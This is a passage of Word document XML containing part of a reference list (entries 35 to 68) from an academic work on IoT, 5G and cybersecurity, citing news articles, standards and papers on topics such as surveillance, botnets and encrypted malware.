      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Guard.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D853A40"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[35]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">E. MacAskill, J. Borger, N. Hopkins, N. Davies, and J. Ball, “GCHQ taps fibre-optic cables for secret access to world’s communications,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Guard.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B186BDC"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[36]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">NCSC, “National Cyber Security Strategy 2016-2021,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Natl. Cyber Secur. Strateg.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEC31F"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[37]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">ciscopress.com, “LANs, WANs, and the Internet (1.3) &amp;gt; Exploring the Modern Computer Network: Types, Functions, and Hardware,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ciscopress.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2013. [Online]. Available: http://www.ciscopress.com/articles/article.asp?p=2158215&amp;seqNum=6. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC03AD4"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[38]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>J. et al Metzler Ashton, “The Next Generation Network Operations Center How the Focus on Application Delivery is Redefining the NOC The Next Generation Network Operations Center How the Focus on Application Delivery is Redefining the NOC,” 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359DA431"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[39]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Paletta, D. Yadron, and J. Valentino-Devries, “Cyberwar Ignites a New Arms Race,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wall Str. J.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB0C915"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[40]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>gartner iot, “Leading the IoT,” 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F304D"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[41]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Lele, “Internet of things (IoT),” in </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Smart Innovation, Systems and Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8CD59B"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[42]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>J. Pan and Z. Yang, “Cybersecurity Challenges and Opportunities in the New ‘Edge Computing + IoT’ World,” 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EBA122"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[43]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Botta, W. De Donato, V. Persico, and A. Pescapé, “Integration of Cloud computing and Internet of Things: A survey,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Futur. Gener. Comput. Syst.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529158B6"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[44]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Forbes, “Here’s Why Data Is Not The New Oil,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>forbes.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: https://www.forbes.com/sites/bernardmarr/2018/03/05/heres-why-data-is-not-the-new-oil/#7b3a3c113aa9. [Accessed: 23-May-2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D052346"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[45]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>J. A. Jerkins and J. Stupiansky, “Mitigating IoT insecurity with inoculation epidemics,” 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3926F026"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[46]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">B. Clark, “Viruses, Spyware, Malware, etc. Explained: Understanding Online Threats,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MakeUseOf</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D7B2BB"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[47]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Antonakakis </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et al.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Understanding the </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mirai Botnet,” in </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>USENIX Security Symposium</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF06A00"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[48]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Norton, “What is a man-in-the-middle attack?,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>norton.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html. [Accessed: 22-Jan-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F796F"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[49]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Department for Digital Culture Media and Sport, “Code of Practice for Consumer IoT Security,” 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8285B1"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[50]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">K. Britton, “Handling Privacy and Security in the Internet of Things,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>J. INTERNET LAW</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4FC67E"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[51]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G. Kulkarni, “Scaling Learning Algorithms toward AI,” in </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Large-Scale Kernel Machines</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7EBEE5"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[52]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. K. Datta and C. Bonnet, “Internet of Things and M2M Communications as Enablers of Smart City Initiatives,” in </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proceedings - NGMAST 2015: The 9th International Conference on Next Generation Mobile Applications, Services and Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E190D"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[53]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G. R. Hiertz </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et al.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “IEEE 802.11s: The WLAN Mesh Standard,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Wirel. Commun.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, vol. 17, no. 1, pp. 104–111, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3FAF6"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[54]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Gozalvez, “Samsung electronics sets 5G speed record at 7.5 Gb/s,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Veh. Technol. Mag.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F9725"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[55]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Bluespace-5G, “Achieving a 90% reduction in power consumption for 5G — Bluespace 5G Technologies,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bluespace-5G</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: https://www.bluespace-5gppp.eu/news/2017/7/12/g4k9pszqqyi1te684kt7b1t1dvzm5m. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D62FE0"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[56]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">K. K. Masade and D. . Bhalerao, “Fifth Generation of Mobile Wireless Communication: 5G,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Int. J. P2P Netw. Trends Technol.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F75826"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[57]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Bloomberg, “Huawei Escaping European Ban, But 5G Regulators Are Closing In - Bloomberg,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bloomberg.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019. [Online]. Available: https://www.bloomberg.com/news/articles/2019-04-15/huawei-s-avoiding-outright-bans-but-not-5g-regulations-in-europe. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FD9759"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[58]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">ncsa, “Security, complexity and Huawei; protecting the UK’s telecoms networksNo Title,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ncsa.gov.uk</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A42099"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[59]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">E. Darmois and O. Elloumi, “Introduction to M2M,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M2M Communications: A Systems Approach</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648383AB"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[60]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. I. Jordan and T. M. Mitchell, “Machine learning: Trends, perspectives, and prospects,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Science</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F1B27"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[61]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Y. Mehmood, N. Haider, M. Imran, A. Timm-Giel, and M. Guizani, “M2M Communications in 5G: State-of-the-Art Architecture, Recent Advances, and Research Challenges,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Commun. Mag.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA16D73"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[62]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. (2016). U. P. D. for M.-C. M. M. N. I. C. L. https://doi. org/10. 1109/LCOMM. 2016. 257169. Han, Y., &amp; Lee </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et al.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “LAAEM: A Method to Enhance LDoS Attack,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Communications Letters</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF0BD28"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[63]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>D. S. Coleman, “Leveraging Bots and AI in the Internet of Things.” [Online]. Available: https://snatchbot.me/blog/17/leveraging-bots-and-ai-in-the-internet-of-things. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14955C0F"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[64]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Fortinet, “Rise of the ‘Hivenet’: Botnets That Think for Themselves,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fortinet</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: https://www.fortinet.com/blog/industry-trends/rise-of-the--hivenet---botnets-that-think-for-themselves.html. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F96B97"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[65]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Pandasecurity, “Encrypted malware: a threat facilitated by the GDPR?,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pandasecurity.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019. [Online]. Available: https://www.pandasecurity.com/mediacenter/malware/encrypted-malware-facilitated-gdpr/. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA145EA"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[66]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Liu, “A Guide for Encrypted Malware Traffic Analytics,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cisco.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: https://blogs.cisco.com/enterprise/a-guide-for-encrypted-traffic-analytics. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503F57B"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[67]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Fox, “Hypervisor,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Datenschutz und Datensicherheit - DuD</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED307E" w14:textId="77777777" w:rsidR="004972EB" w:rsidRPr="004972EB" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[68]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
